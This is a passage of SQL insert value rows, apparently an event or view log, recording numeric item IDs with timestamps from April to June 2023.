(4710, NULL, NULL, 2062, 1, '2023-04-16 03:40:32'),
(4711, NULL, NULL, 2060, 1, '2023-04-16 03:41:06'),
(4712, NULL, NULL, 2059, 1, '2023-04-16 03:41:41'),
(4713, NULL, NULL, 2061, 1, '2023-04-16 03:42:16'),
(4714, NULL, NULL, 2058, 1, '2023-04-16 03:42:50'),
(4715, NULL, NULL, 2064, 1, '2023-04-16 04:17:24'),
(4716, NULL, NULL, 2064, 1, '2023-04-16 09:54:26'),
(4717, NULL, NULL, 2058, 1, '2023-04-16 10:42:54'),
(4718, NULL, NULL, 2055, 1, '2023-04-16 12:03:54'),
(4719, NULL, NULL, 2064, 1, '2023-04-16 12:04:02'),
(4720, NULL, NULL, 2063, 1, '2023-04-16 12:04:05'),
(4721, NULL, NULL, 2062, 1, '2023-04-16 12:04:08'),
(4722, NULL, NULL, 2060, 1, '2023-04-16 12:04:11'),
(4723, NULL, NULL, 2063, 1, '2023-04-17 05:32:22'),
(4724, NULL, NULL, 2063, 1, '2023-04-17 05:32:34'),
(4725, NULL, NULL, 2058, 1, '2023-04-17 14:59:10'),
(4726, NULL, NULL, 2054, 1, '2023-04-18 01:38:53'),
(4727, NULL, NULL, 2060, 1, '2023-04-18 02:18:39'),
(4728, NULL, NULL, 2061, 1, '2023-04-18 02:57:59'),
(4729, NULL, NULL, 2059, 1, '2023-04-18 03:54:59'),
(4730, NULL, NULL, 2064, 1, '2023-04-18 04:36:45'),
(4731, NULL, NULL, 2064, 1, '2023-04-18 04:50:26'),
(4732, NULL, NULL, 2062, 1, '2023-04-18 05:12:43'),
(4733, NULL, NULL, 2055, 1, '2023-04-18 06:07:09'),
(4734, NULL, NULL, 2063, 1, '2023-04-18 06:58:52'),
(4735, NULL, NULL, 2058, 1, '2023-04-18 07:13:18'),
(4736, NULL, NULL, 2053, 1, '2023-04-18 18:39:01'),
(4737, NULL, NULL, 2059, 1, '2023-04-19 09:42:24'),
(4738, NULL, NULL, 2062, 1, '2023-04-19 16:31:40'),
(4739, NULL, NULL, 2063, 1, '2023-04-19 17:19:12'),
(4740, NULL, NULL, 2064, 1, '2023-04-20 00:13:18'),
(4741, NULL, NULL, 2064, 1, '2023-04-20 18:33:29'),
(4742, NULL, NULL, 2063, 1, '2023-04-20 19:28:44'),
(4743, NULL, NULL, 2054, 1, '2023-04-20 21:57:36'),
(4744, NULL, NULL, 2064, 1, '2023-04-21 00:13:20'),
(4745, NULL, NULL, 2059, 1, '2023-04-21 04:15:17'),
(4746, NULL, NULL, 2062, 1, '2023-04-21 07:06:04'),
(4747, NULL, NULL, 2059, 1, '2023-04-21 10:48:33'),
(4748, NULL, NULL, 2064, 1, '2023-04-21 13:39:39'),
(4749, NULL, NULL, 2062, 1, '2023-04-21 17:52:13'),
(4750, NULL, NULL, 2053, 1, '2023-04-21 20:42:28'),
(4751, NULL, NULL, 2064, 1, '2023-04-21 22:25:46'),
(4752, NULL, NULL, 2054, 1, '2023-04-21 22:53:06'),
(4753, NULL, NULL, 2061, 1, '2023-04-22 00:40:42'),
(4754, NULL, NULL, 2060, 1, '2023-04-22 01:11:47'),
(4755, NULL, NULL, 2055, 1, '2023-04-22 03:48:54'),
(4756, NULL, NULL, 2064, 1, '2023-04-22 05:40:50'),
(4757, NULL, NULL, 2064, 1, '2023-04-22 07:25:55'),
(4758, NULL, NULL, 2064, 1, '2023-04-22 10:59:35'),
(4759, NULL, NULL, 2055, 1, '2023-04-23 06:42:30'),
(4760, NULL, NULL, 2060, 1, '2023-04-23 06:42:30'),
(4761, NULL, NULL, 2058, 1, '2023-04-23 06:42:30'),
(4762, NULL, NULL, 2062, 1, '2023-04-23 06:42:30'),
(4763, NULL, NULL, 2062, 1, '2023-04-24 05:10:51'),
(4764, NULL, NULL, 2064, 1, '2023-04-24 10:32:39'),
(4765, NULL, NULL, 2063, 1, '2023-04-24 17:51:28'),
(4766, NULL, NULL, 2064, 1, '2023-04-24 18:07:51'),
(4767, NULL, NULL, 2059, 1, '2023-04-24 21:45:51'),
(4768, NULL, NULL, 2059, 1, '2023-04-25 04:08:12'),
(4769, NULL, NULL, 2064, 1, '2023-04-25 04:50:39'),
(4770, NULL, NULL, 2054, 1, '2023-04-25 07:27:19'),
(4771, NULL, NULL, 2063, 1, '2023-04-25 07:27:19'),
(4772, NULL, NULL, 2064, 1, '2023-04-25 07:51:55'),
(4773, NULL, NULL, 2064, 1, '2023-04-25 07:51:58'),
(4774, NULL, NULL, 2061, 1, '2023-04-25 07:55:18'),
(4775, NULL, NULL, 2062, 1, '2023-04-25 13:02:15'),
(4776, NULL, NULL, 2054, 1, '2023-04-25 15:17:09'),
(4777, NULL, NULL, 2058, 1, '2023-04-25 15:17:10'),
(4778, NULL, NULL, 2059, 1, '2023-04-25 15:17:11'),
(4779, NULL, NULL, 2055, 1, '2023-04-25 15:17:12'),
(4780, NULL, NULL, 2060, 1, '2023-04-25 15:17:13'),
(4781, NULL, NULL, 2063, 1, '2023-04-25 15:17:14'),
(4782, NULL, NULL, 2061, 1, '2023-04-25 15:17:15'),
(4783, NULL, NULL, 2062, 1, '2023-04-25 15:17:16'),
(4784, NULL, NULL, 2064, 1, '2023-04-25 15:17:21'),
(4785, NULL, NULL, 2053, 1, '2023-04-25 15:17:31'),
(4786, NULL, NULL, 2059, 1, '2023-04-25 16:20:03'),
(4787, NULL, NULL, 2064, 1, '2023-04-25 20:42:17'),
(4788, NULL, NULL, 2060, 1, '2023-04-25 21:47:47'),
(4789, NULL, NULL, 2059, 1, '2023-04-26 04:01:17'),
(4790, NULL, NULL, 2062, 1, '2023-04-26 05:13:12'),
(4791, NULL, NULL, 2061, 1, '2023-04-26 15:00:03'),
(4792, NULL, NULL, 2061, 1, '2023-04-26 17:29:27'),
(4793, NULL, NULL, 2061, 1, '2023-04-27 08:34:24'),
(4794, NULL, NULL, 2061, 1, '2023-04-27 10:01:49'),
(4795, NULL, NULL, 2054, 1, '2023-04-27 12:10:56'),
(4796, NULL, NULL, 2061, 1, '2023-04-27 14:57:14'),
(4797, NULL, NULL, 2061, 1, '2023-04-27 23:24:43'),
(4798, NULL, NULL, 2060, 1, '2023-04-28 02:12:13'),
(4799, NULL, NULL, 2063, 1, '2023-04-28 02:21:08'),
(4800, NULL, NULL, 2058, 1, '2023-04-28 02:43:56'),
(4801, NULL, NULL, 2055, 1, '2023-04-28 03:27:02'),
(4802, NULL, NULL, 2061, 1, '2023-04-28 04:23:22'),
(4803, NULL, NULL, 2061, 1, '2023-04-28 04:40:43'),
(4804, NULL, NULL, 2062, 1, '2023-04-28 05:19:43'),
(4805, NULL, NULL, 2060, 1, '2023-04-28 06:28:51'),
(4806, NULL, NULL, 2063, 1, '2023-04-28 06:37:31'),
(4807, NULL, NULL, 2058, 1, '2023-04-28 06:59:25'),
(4808, NULL, NULL, 2055, 1, '2023-04-28 07:41:20'),
(4809, NULL, NULL, 2061, 1, '2023-04-28 08:52:41'),
(4810, NULL, NULL, 2062, 1, '2023-04-28 09:29:12'),
(4811, NULL, NULL, 2054, 1, '2023-04-28 10:26:07'),
(4812, NULL, NULL, 2054, 1, '2023-04-28 10:39:40'),
(4813, NULL, NULL, 2059, 1, '2023-04-28 10:55:24'),
(4814, NULL, NULL, 2064, 1, '2023-04-28 11:08:16'),
(4815, NULL, NULL, 2058, 1, '2023-04-28 13:27:23'),
(4816, NULL, NULL, 2061, 1, '2023-04-29 00:59:40'),
(4817, NULL, NULL, 2060, 1, '2023-04-29 02:07:13'),
(4818, NULL, NULL, 2058, 1, '2023-04-29 02:07:13'),
(4819, NULL, NULL, 2064, 1, '2023-04-29 02:07:14'),
(4820, NULL, NULL, 2063, 1, '2023-04-29 02:07:15'),
(4821, NULL, NULL, 2061, 1, '2023-04-29 02:07:20'),
(4822, NULL, NULL, 2062, 1, '2023-04-29 02:24:47'),
(4823, NULL, NULL, 2055, 1, '2023-04-29 02:24:49'),
(4824, NULL, NULL, 2054, 1, '2023-04-29 02:24:50'),
(4825, NULL, NULL, 2059, 1, '2023-04-29 02:24:51'),
(4826, NULL, NULL, 2054, 1, '2023-04-29 04:46:36'),
(4827, NULL, NULL, 2064, 1, '2023-04-29 10:03:01'),
(4828, NULL, NULL, 2061, 1, '2023-04-30 01:51:26'),
(4829, NULL, NULL, 2064, 1, '2023-04-30 04:30:13'),
(4830, NULL, NULL, 2064, 1, '2023-04-30 06:40:48'),
(4831, NULL, NULL, 2059, 1, '2023-04-30 08:32:31'),
(4832, NULL, NULL, 2064, 1, '2023-04-30 13:37:15'),
(4833, NULL, NULL, 2059, 1, '2023-04-30 19:39:37'),
(4834, NULL, NULL, 2061, 1, '2023-04-30 19:52:10'),
(4835, NULL, NULL, 2055, 1, '2023-04-30 23:19:00'),
(4836, NULL, NULL, 2053, 1, '2023-05-01 06:09:35'),
(4837, NULL, NULL, 2059, 1, '2023-05-01 07:51:51'),
(4838, NULL, NULL, 2060, 1, '2023-05-01 17:21:34'),
(4839, NULL, NULL, 2064, 1, '2023-05-01 18:37:56'),
(4840, NULL, NULL, 2061, 1, '2023-05-01 23:01:56'),
(4841, NULL, NULL, 2061, 1, '2023-05-02 00:56:06'),
(4842, NULL, NULL, 2063, 1, '2023-05-02 15:20:17'),
(4843, NULL, NULL, 2061, 1, '2023-05-02 19:53:33'),
(4844, NULL, NULL, 2063, 1, '2023-05-02 20:35:25'),
(4845, NULL, NULL, 2064, 1, '2023-05-03 01:41:23'),
(4846, NULL, NULL, 2063, 1, '2023-05-03 09:15:05'),
(4847, NULL, NULL, 2064, 1, '2023-05-03 14:31:00'),
(4848, NULL, NULL, 2064, 1, '2023-05-03 16:30:10'),
(4849, NULL, NULL, 2063, 1, '2023-05-03 16:30:25'),
(4850, NULL, NULL, 2062, 1, '2023-05-03 16:30:38'),
(4851, NULL, NULL, 2061, 1, '2023-05-03 16:30:51'),
(4852, NULL, NULL, 2060, 1, '2023-05-03 16:31:04'),
(4853, NULL, NULL, 2059, 1, '2023-05-03 16:31:21'),
(4854, NULL, NULL, 2058, 1, '2023-05-03 16:31:34'),
(4855, NULL, NULL, 2055, 1, '2023-05-03 16:31:47'),
(4856, NULL, NULL, 2054, 1, '2023-05-03 16:32:02'),
(4857, NULL, NULL, 2053, 1, '2023-05-03 16:47:16'),
(4858, NULL, NULL, 2060, 1, '2023-05-04 06:43:33'),
(4859, NULL, NULL, 2063, 1, '2023-05-04 06:54:01'),
(4860, NULL, NULL, 2058, 1, '2023-05-04 07:20:23'),
(4861, NULL, NULL, 2055, 1, '2023-05-04 08:08:15'),
(4862, NULL, NULL, 2061, 1, '2023-05-04 09:32:09'),
(4863, NULL, NULL, 2062, 1, '2023-05-04 10:16:07'),
(4864, NULL, NULL, 2054, 1, '2023-05-04 11:40:26'),
(4865, NULL, NULL, 2059, 1, '2023-05-04 11:59:41'),
(4866, NULL, NULL, 2064, 1, '2023-05-04 12:14:22'),
(4867, NULL, NULL, 2060, 1, '2023-05-04 22:27:50'),
(4868, NULL, NULL, 2060, 1, '2023-05-05 05:13:52'),
(4869, NULL, NULL, 2063, 1, '2023-05-05 05:23:37'),
(4870, NULL, NULL, 2058, 1, '2023-05-05 05:47:11'),
(4871, NULL, NULL, 2055, 1, '2023-05-05 06:30:33'),
(4872, NULL, NULL, 2064, 1, '2023-05-05 06:45:34'),
(4873, NULL, NULL, 2061, 1, '2023-05-05 07:58:40'),
(4874, NULL, NULL, 2054, 1, '2023-05-05 08:11:34'),
(4875, NULL, NULL, 2062, 1, '2023-05-05 08:51:08'),
(4876, NULL, NULL, 2054, 1, '2023-05-05 10:21:25'),
(4877, NULL, NULL, 2059, 1, '2023-05-05 10:41:10'),
(4878, NULL, NULL, 2064, 1, '2023-05-05 10:56:51'),
(4879, NULL, NULL, 2060, 1, '2023-05-05 16:58:36'),
(4880, NULL, NULL, 2064, 1, '2023-05-05 19:11:07'),
(4881, NULL, NULL, 2061, 1, '2023-05-05 23:05:33'),
(4882, NULL, NULL, 2054, 1, '2023-05-06 20:15:19'),
(4883, NULL, NULL, 2055, 1, '2023-05-06 20:15:24'),
(4884, NULL, NULL, 2064, 1, '2023-05-06 20:15:47'),
(4885, NULL, NULL, 2063, 1, '2023-05-06 20:15:51'),
(4886, NULL, NULL, 2062, 1, '2023-05-06 20:15:55'),
(4887, NULL, NULL, 2060, 1, '2023-05-06 20:15:58'),
(4888, NULL, NULL, 2059, 1, '2023-05-06 20:16:06'),
(4889, NULL, NULL, 2061, 1, '2023-05-06 20:16:10'),
(4890, NULL, NULL, 2058, 1, '2023-05-06 20:16:13'),
(4891, NULL, NULL, 2055, 1, '2023-05-07 07:21:48'),
(4892, NULL, NULL, 2060, 1, '2023-05-07 13:49:05'),
(4893, NULL, NULL, 2060, 1, '2023-05-08 12:44:23'),
(4894, NULL, NULL, 2063, 1, '2023-05-08 12:54:05'),
(4895, NULL, NULL, 2058, 1, '2023-05-08 13:18:18'),
(4896, NULL, NULL, 2055, 1, '2023-05-08 14:01:02'),
(4897, NULL, NULL, 2061, 1, '2023-05-08 15:20:25'),
(4898, NULL, NULL, 2060, 1, '2023-05-08 16:04:04'),
(4899, NULL, NULL, 2063, 1, '2023-05-08 16:16:46'),
(4900, NULL, NULL, 2060, 1, '2023-05-08 16:51:27'),
(4901, NULL, NULL, 2063, 1, '2023-05-08 17:01:10'),
(4902, NULL, NULL, 2058, 1, '2023-05-08 17:25:24'),
(4903, NULL, NULL, 2053, 1, '2023-05-08 17:50:45'),
(4904, NULL, NULL, 2055, 1, '2023-05-08 18:08:00'),
(4905, NULL, NULL, 2061, 1, '2023-05-08 19:25:45'),
(4906, NULL, NULL, 2062, 1, '2023-05-08 20:07:20'),
(4907, NULL, NULL, 2054, 1, '2023-05-08 21:22:45'),
(4908, NULL, NULL, 2059, 1, '2023-05-08 21:43:44'),
(4909, NULL, NULL, 2064, 1, '2023-05-08 21:52:44'),
(4910, NULL, NULL, 2060, 1, '2023-05-09 00:02:19'),
(4911, NULL, NULL, 2063, 1, '2023-05-09 00:11:49'),
(4912, NULL, NULL, 2058, 1, '2023-05-09 00:34:53'),
(4913, NULL, NULL, 2059, 1, '2023-05-09 00:47:09'),
(4914, NULL, NULL, 2055, 1, '2023-05-09 01:15:48'),
(4915, NULL, NULL, 2061, 1, '2023-05-09 02:31:05'),
(4916, NULL, NULL, 2063, 1, '2023-05-09 02:42:25'),
(4917, NULL, NULL, 2063, 1, '2023-05-09 03:08:17'),
(4918, NULL, NULL, 2062, 1, '2023-05-09 03:09:58'),
(4919, NULL, NULL, 2054, 1, '2023-05-09 04:22:27'),
(4920, NULL, NULL, 2059, 1, '2023-05-09 04:39:16'),
(4921, NULL, NULL, 2064, 1, '2023-05-09 04:51:38'),
(4922, NULL, NULL, 2064, 1, '2023-05-09 06:45:44'),
(4923, NULL, NULL, 2060, 1, '2023-05-09 09:29:36'),
(4924, NULL, NULL, 2063, 1, '2023-05-09 09:39:05'),
(4925, NULL, NULL, 2053, 1, '2023-05-09 09:54:43'),
(4926, NULL, NULL, 2058, 1, '2023-05-09 10:02:46'),
(4927, NULL, NULL, 2055, 1, '2023-05-09 10:13:22'),
(4928, NULL, NULL, 2055, 1, '2023-05-09 10:43:11'),
(4929, NULL, NULL, 2061, 1, '2023-05-09 11:57:34'),
(4930, NULL, NULL, 2062, 1, '2023-05-09 12:36:46'),
(4931, NULL, NULL, 2054, 1, '2023-05-09 13:50:50'),
(4932, NULL, NULL, 2059, 1, '2023-05-09 14:08:40'),
(4933, NULL, NULL, 2064, 1, '2023-05-09 14:22:22'),
(4934, NULL, NULL, 2059, 1, '2023-05-10 13:32:51'),
(4935, NULL, NULL, 2062, 1, '2023-05-10 15:27:56'),
(4936, NULL, NULL, 2062, 1, '2023-05-10 15:27:59'),
(4937, NULL, NULL, 2062, 1, '2023-05-10 15:28:04'),
(4938, NULL, NULL, 2062, 1, '2023-05-10 15:28:21'),
(4939, NULL, NULL, 2062, 1, '2023-05-10 15:29:41'),
(4940, NULL, NULL, 2063, 1, '2023-05-10 18:01:45'),
(4941, NULL, NULL, 2059, 1, '2023-05-10 23:42:03'),
(4942, NULL, NULL, 2060, 1, '2023-05-11 02:00:52'),
(4943, NULL, NULL, 2064, 1, '2023-05-11 17:18:45'),
(4944, NULL, NULL, 2062, 1, '2023-05-12 00:11:42'),
(4945, NULL, NULL, 2061, 1, '2023-05-12 04:08:18'),
(4946, NULL, NULL, 2060, 1, '2023-05-12 09:03:50'),
(4947, NULL, NULL, 2061, 1, '2023-05-12 21:20:30'),
(4948, NULL, NULL, 2061, 1, '2023-05-13 05:22:34'),
(4949, NULL, NULL, 2059, 1, '2023-05-13 05:40:34'),
(4950, NULL, NULL, 2064, 1, '2023-05-13 07:15:56'),
(4951, NULL, NULL, 2058, 1, '2023-05-13 10:03:16'),
(4952, NULL, NULL, 2064, 1, '2023-05-13 10:03:32'),
(4953, NULL, NULL, 2054, 1, '2023-05-13 10:03:44'),
(4954, NULL, NULL, 2060, 1, '2023-05-13 10:03:59'),
(4955, NULL, NULL, 2062, 1, '2023-05-13 10:04:02'),
(4956, NULL, NULL, 2055, 1, '2023-05-13 10:04:05'),
(4957, NULL, NULL, 2059, 1, '2023-05-13 10:04:17'),
(4958, NULL, NULL, 2063, 1, '2023-05-13 10:04:23'),
(4959, NULL, NULL, 2061, 1, '2023-05-13 10:04:27'),
(4960, NULL, NULL, 2058, 1, '2023-05-13 10:06:54'),
(4961, NULL, NULL, 2064, 1, '2023-05-13 10:07:05'),
(4962, NULL, NULL, 2062, 1, '2023-05-13 10:07:13'),
(4963, NULL, NULL, 2055, 1, '2023-05-13 10:07:16'),
(4964, NULL, NULL, 2054, 1, '2023-05-13 10:07:22'),
(4965, NULL, NULL, 2060, 1, '2023-05-13 10:07:26'),
(4966, NULL, NULL, 2059, 1, '2023-05-13 10:07:30'),
(4967, NULL, NULL, 2063, 1, '2023-05-13 10:07:32'),
(4968, NULL, NULL, 2061, 1, '2023-05-13 10:07:34'),
(4969, NULL, NULL, 2053, 1, '2023-05-13 10:07:49'),
(4970, NULL, NULL, 2055, 1, '2023-05-13 19:30:58'),
(4971, NULL, NULL, 2061, 1, '2023-05-13 22:36:00'),
(4972, NULL, NULL, 2064, 1, '2023-05-14 04:07:33'),
(4973, NULL, NULL, 2054, 1, '2023-05-14 12:02:49'),
(4974, NULL, NULL, 2060, 1, '2023-05-14 12:02:50'),
(4975, NULL, NULL, 2062, 1, '2023-05-14 12:02:51'),
(4976, NULL, NULL, 2058, 1, '2023-05-14 12:02:53'),
(4977, NULL, NULL, 2059, 1, '2023-05-14 12:02:54'),
(4978, NULL, NULL, 2061, 1, '2023-05-14 12:02:55'),
(4979, NULL, NULL, 2055, 1, '2023-05-14 12:02:57'),
(4980, NULL, NULL, 2064, 1, '2023-05-14 12:02:58'),
(4981, NULL, NULL, 2063, 1, '2023-05-14 12:03:00'),
(4982, NULL, NULL, 2053, 1, '2023-05-14 12:03:10'),
(4983, NULL, NULL, 2064, 1, '2023-05-14 17:58:06'),
(4984, NULL, NULL, 2064, 1, '2023-05-15 07:08:50'),
(4985, NULL, NULL, 2054, 1, '2023-05-15 08:12:15'),
(4986, NULL, NULL, 2061, 1, '2023-05-15 15:32:43'),
(4987, NULL, NULL, 2054, 1, '2023-05-15 17:28:40'),
(4988, NULL, NULL, 2055, 1, '2023-05-15 17:28:48'),
(4989, NULL, NULL, 2064, 1, '2023-05-15 17:29:11'),
(4990, NULL, NULL, 2063, 1, '2023-05-15 17:29:17'),
(4991, NULL, NULL, 2062, 1, '2023-05-15 17:29:24'),
(4992, NULL, NULL, 2060, 1, '2023-05-15 17:29:33'),
(4993, NULL, NULL, 2059, 1, '2023-05-15 17:29:39'),
(4994, NULL, NULL, 2061, 1, '2023-05-15 17:29:46'),
(4995, NULL, NULL, 2058, 1, '2023-05-15 17:29:52'),
(4996, NULL, NULL, 2058, 1, '2023-05-15 19:33:26'),
(4997, NULL, NULL, 2064, 1, '2023-05-16 01:34:58'),
(4998, NULL, NULL, 2055, 1, '2023-05-16 01:56:20'),
(4999, NULL, NULL, 2061, 1, '2023-05-16 16:47:30'),
(5000, NULL, NULL, 2059, 1, '2023-05-16 20:39:46'),
(5001, NULL, NULL, 2053, 1, '2023-05-16 21:41:51'),
(5002, NULL, NULL, 2054, 1, '2023-05-17 01:20:08'),
(5003, NULL, NULL, 2060, 1, '2023-05-17 01:51:48'),
(5004, NULL, NULL, 2061, 1, '2023-05-17 02:23:19'),
(5005, NULL, NULL, 2059, 1, '2023-05-17 03:15:54'),
(5006, NULL, NULL, 2064, 1, '2023-05-17 03:59:03'),
(5007, NULL, NULL, 2062, 1, '2023-05-17 04:31:16'),
(5008, NULL, NULL, 2055, 1, '2023-05-17 05:21:18'),
(5009, NULL, NULL, 2063, 1, '2023-05-17 06:11:04'),
(5010, NULL, NULL, 2058, 1, '2023-05-17 06:24:25'),
(5011, NULL, NULL, 2063, 1, '2023-05-17 06:45:40'),
(5012, NULL, NULL, 2054, 1, '2023-05-17 09:18:19'),
(5013, NULL, NULL, 2063, 1, '2023-05-17 10:58:24'),
(5014, NULL, NULL, 2059, 1, '2023-05-17 13:26:02'),
(5015, NULL, NULL, 2061, 1, '2023-05-17 14:42:04'),
(5016, NULL, NULL, 2061, 1, '2023-05-17 14:42:06'),
(5017, NULL, NULL, 2062, 1, '2023-05-17 16:50:39'),
(5018, NULL, NULL, 2062, 1, '2023-05-17 17:42:48'),
(5019, NULL, NULL, 2064, 1, '2023-05-18 14:49:59'),
(5020, NULL, NULL, 2063, 1, '2023-05-18 18:30:41'),
(5021, NULL, NULL, 2053, 1, '2023-05-19 02:57:07'),
(5022, NULL, NULL, 2062, 1, '2023-05-19 11:12:46'),
(5023, NULL, NULL, 2064, 1, '2023-05-19 13:51:59'),
(5024, NULL, NULL, 2054, 1, '2023-05-19 16:13:04'),
(5025, NULL, NULL, 2062, 1, '2023-05-19 16:36:33'),
(5026, NULL, NULL, 2054, 1, '2023-05-19 16:45:36'),
(5027, NULL, NULL, 2059, 1, '2023-05-19 23:49:44'),
(5028, NULL, NULL, 2060, 1, '2023-05-20 16:06:09'),
(5029, NULL, NULL, 2064, 1, '2023-05-21 03:04:18'),
(5030, NULL, NULL, 2059, 1, '2023-05-21 03:58:49'),
(5031, NULL, NULL, 2064, 1, '2023-05-21 14:48:29'),
(5032, NULL, NULL, 2060, 1, '2023-05-21 15:06:50'),
(5033, NULL, NULL, 2061, 1, '2023-05-21 21:01:36'),
(5034, NULL, NULL, 2055, 1, '2023-05-21 21:04:50'),
(5035, NULL, NULL, 2064, 1, '2023-05-21 22:04:25'),
(5036, NULL, NULL, 2053, 1, '2023-05-22 00:59:38'),
(5037, NULL, NULL, 2063, 1, '2023-05-22 01:00:18'),
(5038, NULL, NULL, 2062, 1, '2023-05-22 01:00:30'),
(5039, NULL, NULL, 2060, 1, '2023-05-22 01:00:38'),
(5040, NULL, NULL, 2059, 1, '2023-05-22 01:00:45'),
(5041, NULL, NULL, 2060, 1, '2023-05-22 01:10:51'),
(5042, NULL, NULL, 2060, 1, '2023-05-22 08:25:01'),
(5043, NULL, NULL, 2055, 1, '2023-05-22 11:08:12'),
(5044, NULL, NULL, 2064, 1, '2023-05-22 16:42:17'),
(5045, NULL, NULL, 2061, 1, '2023-05-22 17:30:49'),
(5046, NULL, NULL, 2062, 1, '2023-05-23 02:29:57'),
(5047, NULL, NULL, 2055, 1, '2023-05-23 06:03:35'),
(5048, NULL, NULL, 2063, 1, '2023-05-24 07:46:50'),
(5049, NULL, NULL, 2054, 1, '2023-05-24 20:09:21'),
(5050, NULL, NULL, 2053, 1, '2023-05-24 21:34:36'),
(5051, NULL, NULL, 2059, 1, '2023-05-24 21:34:36'),
(5052, NULL, NULL, 2062, 1, '2023-05-24 23:54:54'),
(5053, NULL, NULL, 2063, 1, '2023-05-25 09:09:56'),
(5054, NULL, NULL, 2062, 1, '2023-05-25 10:17:03'),
(5055, NULL, NULL, 2054, 1, '2023-05-25 10:17:03'),
(5056, NULL, NULL, 2063, 1, '2023-05-25 10:17:04'),
(5057, NULL, NULL, 2061, 1, '2023-05-25 10:17:06'),
(5058, NULL, NULL, 2055, 1, '2023-05-25 10:17:06'),
(5059, NULL, NULL, 2060, 1, '2023-05-25 10:17:08'),
(5060, NULL, NULL, 2059, 1, '2023-05-25 10:17:09'),
(5061, NULL, NULL, 2058, 1, '2023-05-25 10:18:45'),
(5062, NULL, NULL, 2064, 1, '2023-05-25 10:18:47'),
(5063, NULL, NULL, 2064, 1, '2023-05-25 19:55:27'),
(5064, NULL, NULL, 2059, 1, '2023-05-25 20:33:59'),
(5065, NULL, NULL, 2064, 1, '2023-05-26 15:04:38'),
(5066, NULL, NULL, 2061, 1, '2023-05-27 01:05:25'),
(5067, NULL, NULL, 2063, 1, '2023-05-27 08:52:20'),
(5068, NULL, NULL, 2054, 1, '2023-05-27 15:19:41'),
(5069, NULL, NULL, 2055, 1, '2023-05-27 17:48:01'),
(5070, NULL, NULL, 2064, 1, '2023-05-27 18:48:42'),
(5071, NULL, NULL, 2058, 1, '2023-05-28 09:20:01'),
(5072, NULL, NULL, 2064, 1, '2023-05-28 19:27:51'),
(5073, NULL, NULL, 2064, 1, '2023-05-28 19:29:05'),
(5074, NULL, NULL, 2059, 1, '2023-05-29 04:50:45'),
(5075, NULL, NULL, 2060, 1, '2023-05-29 07:03:09'),
(5076, NULL, NULL, 2054, 1, '2023-05-30 03:43:19'),
(5077, NULL, NULL, 2055, 1, '2023-05-30 03:43:21'),
(5078, NULL, NULL, 2064, 1, '2023-05-30 03:43:29'),
(5079, NULL, NULL, 2063, 1, '2023-05-30 03:43:35'),
(5080, NULL, NULL, 2062, 1, '2023-05-30 03:43:37'),
(5081, NULL, NULL, 2060, 1, '2023-05-30 03:43:41'),
(5082, NULL, NULL, 2059, 1, '2023-05-30 03:43:46'),
(5083, NULL, NULL, 2061, 1, '2023-05-30 03:43:47'),
(5084, NULL, NULL, 2058, 1, '2023-05-30 03:43:48'),
(5085, NULL, NULL, 2054, 1, '2023-05-30 05:46:16'),
(5086, NULL, NULL, 2060, 1, '2023-05-30 07:17:20'),
(5087, NULL, NULL, 2063, 1, '2023-05-30 07:26:15'),
(5088, NULL, NULL, 2064, 1, '2023-05-30 07:36:41'),
(5089, NULL, NULL, 2063, 1, '2023-05-30 07:36:52'),
(5090, NULL, NULL, 2062, 1, '2023-05-30 07:37:03'),
(5091, NULL, NULL, 2061, 1, '2023-05-30 07:37:13'),
(5092, NULL, NULL, 2060, 1, '2023-05-30 07:37:25'),
(5093, NULL, NULL, 2059, 1, '2023-05-30 07:37:32'),
(5094, NULL, NULL, 2058, 1, '2023-05-30 07:37:41'),
(5095, NULL, NULL, 2055, 1, '2023-05-30 07:37:48'),
(5096, NULL, NULL, 2054, 1, '2023-05-30 07:37:55'),
(5097, NULL, NULL, 2053, 1, '2023-05-30 07:39:34'),
(5098, NULL, NULL, 2058, 1, '2023-05-30 07:49:26'),
(5099, NULL, NULL, 2062, 1, '2023-05-30 07:52:03'),
(5100, NULL, NULL, 2060, 1, '2023-05-30 08:20:40'),
(5101, NULL, NULL, 2063, 1, '2023-05-30 08:29:17'),
(5102, NULL, NULL, 2058, 1, '2023-05-30 08:51:27'),
(5103, NULL, NULL, 2055, 1, '2023-05-30 09:50:29'),
(5104, NULL, NULL, 2061, 1, '2023-05-30 11:16:16'),
(5105, NULL, NULL, 2062, 1, '2023-05-30 11:56:36'),
(5106, NULL, NULL, 2054, 1, '2023-05-30 13:10:28'),
(5107, NULL, NULL, 2059, 1, '2023-05-30 13:25:43'),
(5108, NULL, NULL, 2064, 1, '2023-05-30 13:38:23'),
(5109, NULL, NULL, 2055, 1, '2023-05-30 21:04:23'),
(5110, NULL, NULL, 2064, 1, '2023-05-30 22:26:16'),
(5111, NULL, NULL, 2064, 1, '2023-05-31 04:09:16'),
(5112, NULL, NULL, 2061, 1, '2023-05-31 04:43:56'),
(5113, NULL, NULL, 2060, 1, '2023-05-31 08:15:25'),
(5114, NULL, NULL, 2055, 1, '2023-05-31 12:41:38'),
(5115, NULL, NULL, 2063, 1, '2023-05-31 15:10:03'),
(5116, NULL, NULL, 2063, 1, '2023-05-31 16:42:54'),
(5117, NULL, NULL, 2063, 1, '2023-06-01 05:05:55'),
(5118, NULL, NULL, 2062, 1, '2023-06-01 12:04:38'),
(5119, NULL, NULL, 2054, 1, '2023-06-01 14:15:52'),
(5120, NULL, NULL, 2054, 1, '2023-06-01 14:43:48'),
(5121, NULL, NULL, 2055, 1, '2023-06-01 14:44:05'),
(5122, NULL, NULL, 2064, 1, '2023-06-01 14:45:16'),
(5123, NULL, NULL, 2063, 1, '2023-06-01 14:45:35'),
(5124, NULL, NULL, 2062, 1, '2023-06-01 14:45:53'),
(5125, NULL, NULL, 2060, 1, '2023-06-01 14:46:12'),
(5126, NULL, NULL, 2059, 1, '2023-06-01 14:46:30'),
(5127, NULL, NULL, 2061, 1, '2023-06-01 14:46:48'),
(5128, NULL, NULL, 2058, 1, '2023-06-01 14:47:06'),
(5129, NULL, NULL, 2063, 1, '2023-06-01 20:47:04'),
(5130, NULL, NULL, 2063, 1, '2023-06-01 20:47:45'),
(5131, NULL, NULL, 2063, 1, '2023-06-01 20:47:59'),
(5132, NULL, NULL, 2055, 1, '2023-06-01 23:27:35'),
(5133, NULL, NULL, 2062, 1, '2023-06-02 01:08:38'),
(5134, NULL, NULL, 2061, 1, '2023-06-02 12:41:43'),
(5135, NULL, NULL, 2054, 1, '2023-06-02 22:12:28'),
(5136, NULL, NULL, 2064, 1, '2023-06-03 09:13:24'),
(5137, NULL, NULL, 2059, 1, '2023-06-03 10:21:13'),
